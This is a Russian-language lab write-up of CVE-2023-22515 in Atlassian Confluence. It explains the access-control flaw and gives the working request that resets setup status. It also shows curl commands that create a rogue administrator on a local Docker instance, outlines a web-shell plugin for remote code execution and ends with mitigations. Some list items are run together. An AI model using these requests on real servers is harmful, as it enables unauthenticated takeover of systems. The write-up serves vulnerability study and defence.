
Детальный анализ и proof-of-concept эксплойт для CVE-2023-22515, критической уязвимости нарушения контроля доступа в Atlassian Confluence Data Center и Server, позволяющей создание учетной записи администратора без аутентификации и потенциальное удаленное выполнение кода.
CVE-2023-22515 — это критическая уязвимость нарушенного контроля доступа (Broken Access Control), обнаруженная в продуктах Atlassian Confluence Data Center и Server. Неаутентифицированный злоумышленник может удалённо повторно активировать процесс начальной настройки сервера и создать новую учётную запись администратора, полностью захватив систему.
Ключевая причина этой уязвимости — недостаточная проверка между механизмом привязки параметров фреймворка XWork2 и логикой обработки действий (Action) в Confluence.
Злоумышленник может манипулировать значением bootstrapStatusProvider.applicationConfig.setupComplete через параметры URL, установив его в . Этот атрибут является важным флагом, определяющим, завершена ли установка и настройка Confluence.
falseGET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>
После отправки этого запроса сервер в памяти будет считать, что настройка не завершена. Это не изменяет постоянный файл конфигурации (confluence.cfg.xml), но изменяет состояние во время выполнения, позволяя обойти контроль доступа.
/server-info.action, передавая параметр bootstrapStatusProvider.applicationConfig.setupComplete=false./setup/* снимаются./setup/setupadministrator.action и создаёт новую учётную запись системного администратора (System Administrator).Для создания уязвимой версии (8.5.1) Confluence Server использовался Docker.
atlassian/confluence-server:8.5.1docker-compose.yml (сокращённо):
services:
confluence:
image: atlassian/confluence-server:8.5.1
ports:
- "8090:8090"
environment:
- ATL_DB_TYPE=postgresql
# ... DB 설정 ...
Чтобы избежать проблем с зависимостями Python, PoC был написан и запущен в виде Bash-скрипта с использованием curl.
Поток эксплойта (Exploit Flow):
Сброс статуса настройки:
curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
Результат: Был возвращён ответ HTTP 302 с перенаправлением, что подтверждает внутренний сброс состояния завершения настройки.
Создание администратора:
curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
-H "X-Atlassian-Token: no-check" \
--data "username=hacked_admin&password=p@ssw0rd123&..."
Результат: Благодаря этому запросу была предпринята попытка создания учётной записи hacked_admin, после чего на странице входа стал возможен доступ под этой учётной записью.
Необходимо немедленно обновиться до последней версии, предоставленной Atlassian.
Если исправление невозможно, необходимо заблокировать доступ к конечным точкам /setup/* на уровне сети (балансировщик нагрузки, WAF, обратный прокси-сервер и т.д.).
/setup/*CVE-2023-22515 позволяет злоумышленнику, получившему права администратора, перейти к выполнению системных команд (RCE).
Confluence предоставляет администраторам право устанавливать плагины (дополнения). Злоумышленник может использовать это, загрузив вредоносный плагин, содержащий веб-шелл (Web Shell), и таким образом получить контроль над операционной системой сервера.
/setup/finishsetup.action (требуется обход лицензии) или исследовать доступные меню администратора через существующую сессиюConfluence Administration -> Manage Apps -> Upload App.jar файл, содержащий вредоносный Java-класс/plugins/servlet/webshell?cmd=id), для выполнения системных командВ данной лабораторной среде (Docker) нет действительной лицензии Confluence, поэтому невозможно завершить этап начальной настройки (Setup). Соответственно, хотя запрос на создание учётной записи администратора был успешным (302 Redirect), последующий доступ к меню плагинов и фактическое выполнение RCE были ограничены. В реальной эксплуатационной среде лицензия зарегистрирована, поэтому RCE возможно немедленно без таких ограничений.
CVE-2023-22515 — это очень опасная уязвимость, позволяющая получить права администратора без аутентификации. Атака возможна простой манипуляцией параметрами URL, что делает её очень низкой по сложности. Поэтому организации, использующие соответствующие версии, должны немедленно применить исправления или меры по смягчению.